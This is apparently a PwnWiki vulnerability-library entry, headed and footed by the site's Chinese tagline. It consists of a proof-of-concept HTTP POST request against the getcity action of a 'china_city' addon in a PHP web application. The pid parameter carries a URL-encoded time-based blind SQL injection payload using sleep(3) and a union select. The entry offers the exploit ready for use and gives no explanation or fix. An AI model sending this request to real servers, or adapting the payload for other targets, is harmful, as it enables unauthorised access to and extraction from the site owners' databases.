免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
POC
POST /index.php?s=%2Fhome%2Faddons%2F_addons%2Fchina_city%2F_controller%2Fchina_city%2F_action%2Fgetcity.html HTTP/1.1 Host: 0-sec.org User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Content-Length: 116 Accept: */* Cookie: Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,und;q=0.7 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.95.131 Referer: http://192.168.95.131/uploads_download_2019-07-16_5d2d5d4697d88/index.php?s=/ucenter/config/index.html X-Requested-With: XMLHttpRequest Accept-Encoding: gzip cid=0&pid%5B0%5D=%3D%28select%2Afrom%28select%2Bsleep%283%29union%2F%2A%2A%2Fselect%2B1%29a%29and+3+in+&pid%5B1%5D=3
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
